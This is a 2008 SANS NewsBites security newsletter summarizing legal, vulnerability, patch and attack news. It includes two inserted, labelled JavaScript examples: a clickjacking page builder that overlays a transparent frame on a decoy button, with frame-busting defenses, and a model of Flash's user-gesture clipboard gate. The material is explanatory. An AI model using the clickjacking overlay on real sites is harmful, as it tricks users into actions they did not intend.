-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

*************************************************************************
SANS NewsBites September 23, 2008 Vol. 10, Num. 75
*************************************************************************
TOP OF THE NEWS
Stronger Identity Theft Act Awaits Presidential Signature
Nevada Data Encryption Law Takes Effect October 1
North Carolina to Use Scanners to Ensure Voters Receive Proper Ballots
Survey Shows Two-Thirds of Organizations Have Experienced Cyber Attacks
THE REST OF THE WEEK'S NEWS
ARRESTS, CHARGES & CONVICTIONS
Former State Dept. Intelligence Analyst Pleads Guilty to Passport
File Snooping
VULNERABILITIES
Citect Acknowledges Seriousness of SCADA Flaw
Clickjacking Talk Cancelled
UPDATES AND PATCHES
Adobe Will Fix Clipboard Vulnerability in Flash 10
VMware Issues Fixes for Critical Buffer Overflow Flaws
ATTACKS
Palin eMail Attack Linked to Tennessee College Student
Palin Should Not Have Used Unsecured eMail for State Business
Communication
MISCELLANEOUS
Network Provider's Negative Reputation is its Downfall
Apple's Patching Process Debated

******************** Sponsored By Palo Alto Networks ********************

Attention Cisco PIX Users: Now that Cisco announced "end of life" for
its PIX Security Appliances, consider a transition to award-winning next
generation firewalls from Palo Alto Networks. Get unprecedented
visibility and control of all applications, users, and content - and get
instant rebates of up to $6,000! Learn more, watch this short webcast.

http://www.sans.org/info/33404
*************************************************************************
TRAINING UPDATE
-- NETWORK SECURITY 2008: Las Vegas (9/28-10/6) 50 courses; big security
tools expo; lots of evening sessions: http://www.sans.org/ns2008/
-- Monterey (10/31-11/6) http://www.sans.org/info/30738
-- Sydney Australia (10/27-11/1) http://www.sans.org/sydney08/
-- Vancouver (11/17-11/22) http://www.sans.org/vancouver08/
and in 100 other cities and on line any time: www.sans.org
*************************************************************************

TOP OF THE NEWS
--Stronger Identity Theft Act Awaits Presidential Signature
(September 17 & 20, 2008)
The Identity Theft Enforcement and Restitution Act of 2008 has been
approved by both houses of the US Congress and now goes before the
president to be signed into law. The bill clarifies what constitutes
identity and information theft and increases the penalties for those
found guilty. The act does away with the minimum level of damages
required for charges to be filed against information thieves. In
addition, victims of identity theft would have the right to sue the
culprits for restitution.
http://www.vnunet.com/vnunet/news/2226560/identity-theft-bill-set
http://www.eweek.com/c/a/Security/Congress-Approves-Computer-Fraud-Bill/

--Nevada Data Encryption Law Takes Effect October 1
(September 19, 2008)
A Nevada law requiring that businesses encrypt all transmissions of
personal identifying information over the Internet becomes enforceable
as of October 1, 2008. An attorney who has been keeping a close eye on
the issue has expressed concern that the statute is overly broad in its
definition of what constitutes encryption, does not address industry
standards, and is not clear about how those who violate the law will be
penalized.
http://blog.baselinemag.com/bottom_line/content/security/nevada_deadline_on_email_encryption_looming.html
[Editor's Note (Schultz): Interestingly, many of the criticisms of this
law have also previously been leveled against SB 1386. SB 1386
nevertheless has had a huge impact on data security notification in most
states within the US.]

--North Carolina to Use Scanners to Ensure Voters Receive Proper Ballots
(September 19, 2008)
This November, voters in North Carolina will have an increased level of
confidence that they are receiving the correct ballot on which to record
their votes thanks to the use of scanners. The state uses more than 100
different ballots; voters in North Carolina mark their choices directly
on their ballots. Poll workers will scan each voter's voter
authorization form as well as the associated ballot; the process should
catch any anomalies. The scanners were tested in several municipalities
in the state's May primary election and will be used in all precincts
in November's election.
http://www.informationweek.com/shared/printableArticle.jhtml?articleID=210602730

--Survey Shows Two-Thirds of Organizations Have Experienced Cyber Attacks
(September 22, 2008)
According to the US Department of Justice's 2005 National Computer
Security Survey, over two-thirds of the more than 7,800 companies
responding to the survey experienced at least one cybercrime incident
during that year. The incidents were classified as cyber attacks, cyber
theft, or other. Three-fourths of the cyber attacks originated from
outside the organizations; the same percentage of cyber thefts
originated from within the organizations. More than half of the cyber
thefts were reported to authorities, while just six percent of cyber
attacks were reported.
http://www.securityfocus.com/brief/825
The actual survey results: http://www.ojp.usdoj.gov/bjs/pub/pdf/cb05.pdf

************************** Sponsored Links: ***************************

1) Join your peers and other professionals at the Forensics & Incident
Response Summit October 13-14.
http://www.sans.org/info/33409

2) ALERT: Forrester Webcast: Web 2.0 Browser Exploits- What Hackers know
that you don't
http://www.sans.org/info/33414
*************************************************************************

THE REST OF THE WEEK'S NEWS
ARRESTS, CHARGES & CONVICTIONS
--Former State Dept. Intelligence Analyst Pleads Guilty to
Passport File Snooping
(September 17 & 22, 2008)
A former US State Department intelligence analyst has pleaded guilty to
unauthorized access to a State Department computer for snooping on
passport records of well known people. Lawrence Yontz could face up to
a year in prison for accessing the files, which include those of major
players in the current presidential race. A recent audit found "a
general lack of policies, procedures, guidance and training" at the
State Department's passport bureau. Yontz admitted to having perused
the files of approximately 200 well-known individuals and their
families; he will cooperate with the government's continuing
investigation.
http://blog.wired.com/27bstroke6/2008/09/idle-curiosity.html
http://www.cnn.com/2008/POLITICS/09/16/passport.snooping/

VULNERABILITIES
--Citect Acknowledges Seriousness of SCADA Flaw
(September 19, 2008)
Citect has replaced its advisory about a flaw in its CitectSCADA
(Supervisory Control and Data Acquisition) software. The original
advisory downplayed the seriousness of the flaw, but after exploit code
for the flaw was published last week, the company replaced the advisory
with a more strongly worded version. The person who released the code
said he did so because he did not believe Citect was taking the threat
seriously enough; he is pleased that the company has acknowledged the
severity of the flaw. Citect released a patch for the flaw in June
2008.
http://www.theregister.co.uk/2008/09/19/scada_advisory_pulled/
http://www.citect.com/documents/news_and_media/CitectSCADA-security-response.pdf
[Editor's Note (Skoudis): Sadly, SCADA vendors usually have to be forced
into disclosing the significance of security flaws and the importance
of their patches. As an industry, we really need to keep the pressure
on the SCADA vendors for quickly and thoroughly fixing flaws, and then
warning their customers about the issue. If your organization relies
on SCADA devices for your operations, make sure your security personnel
are in touch with your main SCADA vendors to get vulnerability
information in a timely fashion.
(Debate) A small difference of opinion arose among NewsBites editors
on whether to list the name of the person who disclosed the vulnerability
"because he did not believe [the vendor] was taking the threat seriously
enough." Editor and security pioneer Marcus Ranum had the last word:
The people who do exploit and vuln releases do it for attention. Naming
them in NewsBites plays right into their hands; I generally recommend
that we not reward disclosure, as a matter of policy. Feed cockroaches
and you just get more cockroaches.]

--Clickjacking Talk Cancelled
(September 19, 2008)
A talk on a type of vulnerability dubbed "clickjacking" scheduled to be
delivered at the OWASP Conference has been cancelled. The people
presenting the talk became concerned that the flaws are serious enough
that it would be irresponsible to disclose them without first giving
vendors time to fix them. The experts scheduled to give the talk have
contacted vendors whose products are believed to be vulnerable to the
type of exploit they had planned to speak about. "Clickjacking"
involves a number of flaws that could be exploited to trick users into
clicking on a page element, such as a link or button, that is never or
only briefly visible, so that a click the user aims at one thing is
delivered to another.
http://www.heise-online.co.uk/security/Is-clickjacking-the-next-threat--/news/111570
http://ha.ckers.org/blog/20080915/clickjacking/
[Editor's Note (Skoudis): Kudos to Rsnake and Jeremiah Grossman for
acting responsibly here and explaining so clearly their reasons for
doing so. They have set an effective standard for us all.]
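The following is an added example, not code from the newsletter or from the researchers named above. It shows the geometry behind the technique described in this item (a transparent frame stacked over a visible decoy, positioned so the victim page's control sits under the decoy) together with the frame-detection check sites used at the time and the response headers browsers added later. All URLs, coordinates, page text and function names are constructed for illustration.

```javascript
// Added example (not code from the newsletter or from the researchers named
// above): the geometry of a clickjacking overlay and the checks a site can
// use against being framed. URLs, coordinates and page text are constructed.

// Attacker side. The victim page is loaded in an iframe that is fully
// transparent (opacity:0) but stacked above a visible decoy (z-index), so the
// browser delivers the user's click to the invisible frame, not the decoy.

// Offset at which to place the iframe so that the victim's control, located
// at targetInVictim inside the victim page, sits exactly under the decoy.
function frameOffset(decoy, targetInVictim) {
  return { top: decoy.top - targetInVictim.top, left: decoy.left - targetInVictim.left };
}

function buildClickjackPage(victimUrl, decoy, targetInVictim) {
  const off = frameOffset(decoy, targetInVictim);
  return [
    '<!doctype html><html><body>',
    `<button style="position:absolute;top:${decoy.top}px;left:${decoy.left}px">Claim your prize</button>`,
    `<iframe src="${victimUrl}" style="position:absolute;top:${off.top}px;left:${off.left}px;` +
      'width:800px;height:600px;border:0;opacity:0;z-index:10"></iframe>',
    '</body></html>',
  ].join('\n');
}

// Defender side, as practised in 2008: detect that this document is not the
// top-level window and break out. `win` is the page's window object, passed
// in so the check can be exercised outside a browser (isFramed(window) in a
// page). A hostile parent can interfere with this, hence the headers below.
function isFramed(win) {
  return win.top !== win.self;
}

function frameBustingScript() {
  return '<script>if (top !== self) { top.location = self.location; }</script>';
}

// Defender side, later browsers: refuse framing at the response level.
// X-Frame-Options arrived in IE8 (2009) and CSP frame-ancestors later still;
// neither existed when the talk above was cancelled.
function antiFramingHeaders() {
  return {
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'none'",
  };
}

// Stand-alone demo: print the attacker page and exercise the checks.
if (typeof require !== 'undefined' && require.main === module) {
  const decoy = { top: 200, left: 300 };   // where the decoy button is drawn
  const target = { top: 340, left: 120 };  // where the victim's button sits in its own page
  console.log(buildClickjackPage('https://victim.example/account/delete', decoy, target));
  const w = {};
  console.log('framed:', isFramed({ top: w, self: w }), isFramed({ top: w, self: {} }));
  console.log(antiFramingHeaders(), frameBustingScript());
}
```

Run with node and open the printed HTML in a browser to see that the visible button cannot be clicked: the transparent frame above it receives every pointer event. The offset arithmetic is the whole attack; the defenses are the frame check a page can make about itself and, in later browsers, the header that stops the page being framed at all.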

UPDATES AND PATCHES
--Adobe Will Fix Clipboard Vulnerability in Flash 10
(September 22, 2008)
Adobe Systems Inc. says it will fix a vulnerability in Flash Player when
it releases Flash Player 10. The flaw has been actively exploited to
place URLs that link to malicious websites on users' clipboards. The new
version will restrict the setClipboard command so that it can only be
invoked in response to a user-initiated action; calls not triggered by
user interaction will be rejected. The availability date for the fix is
not known.
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9115269&source=rss_topic17
http://www.heise-online.co.uk/security/Adobe-to-prevent-clipboard-attacks-via-Flash-Player--/news/111581
http://www.adobe.com/devnet/flashplayer/articles/fplayer10_security_changes.html
http://labs.adobe.com/technologies/flashplayer10/
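The block below is an added example, not Adobe's code, modelling the rule described in this item: a privileged call succeeds only while a user-initiated event is being dispatched, and a call made from a timer, on page load, or from a callback that a user event merely scheduled for later is refused. Class and method names are constructed; the real control lives inside Flash Player and gates ActionScript's System.setClipboard(), and which events Adobe counts as user-initiated is as documented in the Adobe links above, not in this model.

```javascript
// Added example (not Adobe's code): a model of the Flash Player 10 rule
// described above, where a privileged call (writing the clipboard) succeeds
// only while a user-initiated event is being dispatched. Class and method
// names are constructed; in Flash the gated call is System.setClipboard().

class ClipboardGate {
  constructor() {
    this.clipboard = '';       // stand-in for the system clipboard
    this.inUserEvent = false;  // true only during dispatch of a user gesture
    this.rejected = [];        // audit trail of blocked writes
  }

  // Entry point for real user input (click, key press). The flag covers only
  // the synchronous extent of the handler, so a handler that schedules a
  // write for later does not carry the permission with it.
  dispatchUserEvent(type, handler) {
    this.inUserEvent = true;
    try {
      handler(type);
    } finally {
      this.inUserEvent = false;
    }
  }

  // Entry point for everything else: timers, load events, script-driven calls.
  dispatchScriptCallback(handler) {
    handler();
  }

  // The gated API. Before the fix any caller could overwrite the clipboard at
  // any time, so a timer-driven writer could replant its URL continually.
  // After the fix the write succeeds only inside a user event.
  setClipboard(text) {
    if (!this.inUserEvent) {
      this.rejected.push(text);
      return false;
    }
    this.clipboard = text;
    return true;
  }
}

// Scenario: a script-driven write tries to plant a URL (constructed) while a
// legitimate "copy link" button works as intended, and a user click that
// merely schedules a later write is also refused.
function runScenario() {
  const gate = new ClipboardGate();
  const plantedUrl = 'http://malicious.example/fake-av';  // constructed
  const results = {};

  // No user gesture: rejected.
  gate.dispatchScriptCallback(() => {
    results.scriptWrite = gate.setClipboard(plantedUrl);
  });

  // Inside a click handler: allowed.
  gate.dispatchUserEvent('click', () => {
    results.userWrite = gate.setClipboard('https://example.org/article/42');
  });

  // Click handler that defers the write to a later callback: rejected,
  // because the gesture flag was cleared when the handler returned.
  let deferred;
  gate.dispatchUserEvent('click', () => {
    deferred = () => gate.setClipboard(plantedUrl);
  });
  gate.dispatchScriptCallback(() => {
    results.deferredWrite = deferred();
  });

  results.clipboard = gate.clipboard;
  results.rejected = gate.rejected.length;
  return results;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(runScenario());
}
```

The design point is that the permission is tied to the dispatch of the gesture itself rather than to the page or script that handled it; anything that runs after the handler returns, however it was scheduled, is back outside the gate.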

--VMware Issues Fixes for Critical Buffer Overflow Flaws
(September 19 & 22, 2008)
VMware has released patches to address two buffer overflow
vulnerabilities in some of its products. The flaws affect the openwsman
component in ESXi and ESX 3.5 and could be exploited to allow remote
code execution. VMware also released two other patches to address
additional vulnerabilities in libpng, bind, net-snmp and perl for ESX
3.5 servers.
http://www.theregister.co.uk/2008/09/19/vmware_critical_vuln_patched/print.html
http://www.zdnetasia.com/news/security/0,39044215,62046380,00.htm
http://www.vmware.com/security/advisories/VMSA-2008-0015.html
[Editor's Note (Veltsos): As organizations increase their deployment
of virtual environments, attackers will focus on weaknesses in
virtualization technology implementations. The security community has
already pointed out the limitations and problems one faces when running
firewalls, IDS/IPS, or incident response in virtual environments.
http://www.cio.com/article/360713/Today_s_Virtualization_Security_Tools_One_Hidden_Risk_?contentId=360713&slug]

ATTACKS
--Palin eMail Attack Linked to Tennessee College Student
(September 21 & 22, 2008)
The FBI has served a warrant at the apartment of a University of
Tennessee student who is believed to be involved with the intrusion into
Governor Sarah Palin's Yahoo! email account. No charges have yet been
filed, but three roommates of the man under suspicion, David Kernell,
have been served with court summonses. Kernell was pegged as a possible
culprit when his email address was linked to a posting to a bulletin
board about having broken into Palin's account. The man who runs
Ctunnel, a proxy service that was used by the attacker, initially said
the IP address information he has regarding the attack does not point
to Kernell. However, he has since acknowledged that the IP address used
to break into the account was traced to an Illinois-based internet
service provider (ISP) that provides service to the housing complex
where Kernell lives.
http://www.theregister.co.uk/2008/09/22/palin_hack_suspect_search_warrant/print.html
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9115238&source=rss_topic17
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9115289&source=rss_topic17
http://blog.wired.com/27bstroke6/2008/09/fbi-raid-apartm.html

--Palin Should Not Have Used Unsecured eMail for State Business
Communication
(September 22, 2008)
Government Computer News (GCN) columnist William Jackson does not
dispute that breaking into Governor Palin's email account was wrong, but
also observes that Palin should have known better than to use unsecured
email accounts to conduct state business, ostensibly to prevent the
communications from being subject to disclosure laws.
http://www.gcn.com/online/vol1_no1/47187-1.html?topic=security&page=1

MISCELLANEOUS
--Network Provider's Negative Reputation is its Downfall
(September 22, 2008)
California-based network provider Intercage, also known as Atrivo, has
lost its last upstream Internet provider, which pulled the plug after
coming under fire for supplying service to a company branded a source
of malware on the Internet. Atrivo had reportedly been turning a blind
eye to spammers and other Internet malware purveyors who were its
clients. After reports surfaced in the media several weeks ago about
the prevalence of malware emanating from the Atrivo network, most of its
upstream providers severed their business relationships with the
company. The last remaining provider was pushed to the brink after
Spamhaus blacklisted more than 1,000 of its IP addresses. Once the
provider, Pacific Internet Exchange (PIE), stopped providing Atrivo with
service, Spamhaus removed virtually all of the blocks. Atrivo president
and owner Emil Kacperski says he is being treated unfairly and that he
received an average of just five complaints a week about malicious
domains on his network. While the community is in agreement that
consistently problematic customers need to be dealt with, some have
voiced the opinion that what occurred with Atrivo was the equivalent of
vigilante justice.
http://voices.washingtonpost.com/securityfix/2008/09/internet_shuns_us_based_isp_am.html?nav=rss_blog
http://www.theregister.co.uk/2008/09/22/intercage_goes_dark/print.html

--Apple's Patching Process Debated
(September 22, 2008)
A number of security experts have said that Apple's unpredictable
patching process is problematic, possibly putting companies in a
position to decide not to patch because they don't know when the next
one will be coming. Others say that it is unfair to compare Apple to
Microsoft, which releases patches on a predictable schedule; instead,
it should be compared to other Unix vendors. In addition, Apple's
tendency to issue patches as soon as they become available gives
attackers a smaller window of opportunity than does Microsoft.
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9115288&intsrc=hm_ts_head
[Editor's Note (Skoudis): I understand the arguments of both sides, but
I really would prefer to see more predictable patch releases from Apple,
which would greatly help operations in the enterprise space. Also, it
seems to me that the comparison with Unix hardly matters if Apple is
gunning for higher market share on corporate desktops by grabbing market
share from Windows.]

*************************************************************************
The Editorial Board of SANS NewsBites

Eugene Schultz, Ph.D., CISM, CISSP is CTO of High Tower Software and the
author/co-author of books on Unix security, Internet security, Windows
NT/2000 security, incident response, and intrusion detection and
prevention. He was also the co-founder and original project manager of
the Department of Energy's Computer Incident Advisory Capability (CIAC).

John Pescatore is Vice President at Gartner Inc.; he has worked in
computer and network security since 1978.

Stephen Northcutt founded the GIAC certification and currently serves
as President of the SANS Technology Institute, a post graduate level IT
Security College, www.sans.edu.

Johannes Ullrich is Chief Technology Officer of the Internet Storm Center.

Howard A. Schmidt served as CSO for Microsoft and eBay and as Vice-Chair
of the President's Critical Infrastructure Protection Board.

Ed Skoudis is co-founder of Intelguardians, a security research and
consulting firm, and author and lead instructor of the SANS Hacker
Exploits and Incident Handling course.

Tom Liston is a Senior Security Consultant and Malware Analyst for
Intelguardians, a handler for the SANS Institute's Internet Storm
Center, and co-author of the book Counter Hack Reloaded.

Dr. Eric Cole is an instructor, author and fellow with The SANS
Institute. He has written five books, including Insider Threat and he
is a senior Lockheed Martin Fellow.

Mason Brown is one of a very small number of people in the information
security field who have held a top management position in a Fortune 50
company (Alcoa). He is leading SANS' global initiative to improve
application security.

Marcus J. Ranum built the first firewall for the White House and is
widely recognized as a security products designer and industry
innovator.

Mark Weatherford, CISSP, CISM, is Executive Officer of the California
Office of Information Security and Privacy Protection.

Alan Paller is director of research at the SANS Institute

Clint Kreitner is the founding President and CEO of The Center for
Internet Security.

Brian Honan is an independent security consultant based in Dublin, Ireland.

Dr. Christophe Veltsos, CISSP, CISA, GCFA teaches Information Security
courses at Minnesota State University, Mankato. He is the President of
Prudent Security LLC and also serves as the President of the Mankato
Chapter ISSA.

Please feel free to share this with interested parties via email, but
no posting is allowed on web sites. For a free subscription, (and for
free posters) or to update a current subscription, visit
http://portal.sans.org/


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAkjZFkcACgkQ+LUG5KFpTkaC1QCfXaOOKyea0nEDRPptgEeC4eOj
f9YAnjrU3dZcp12Xipq7oFHdB7MLmVwX
=AS6H
-----END PGP SIGNATURE-----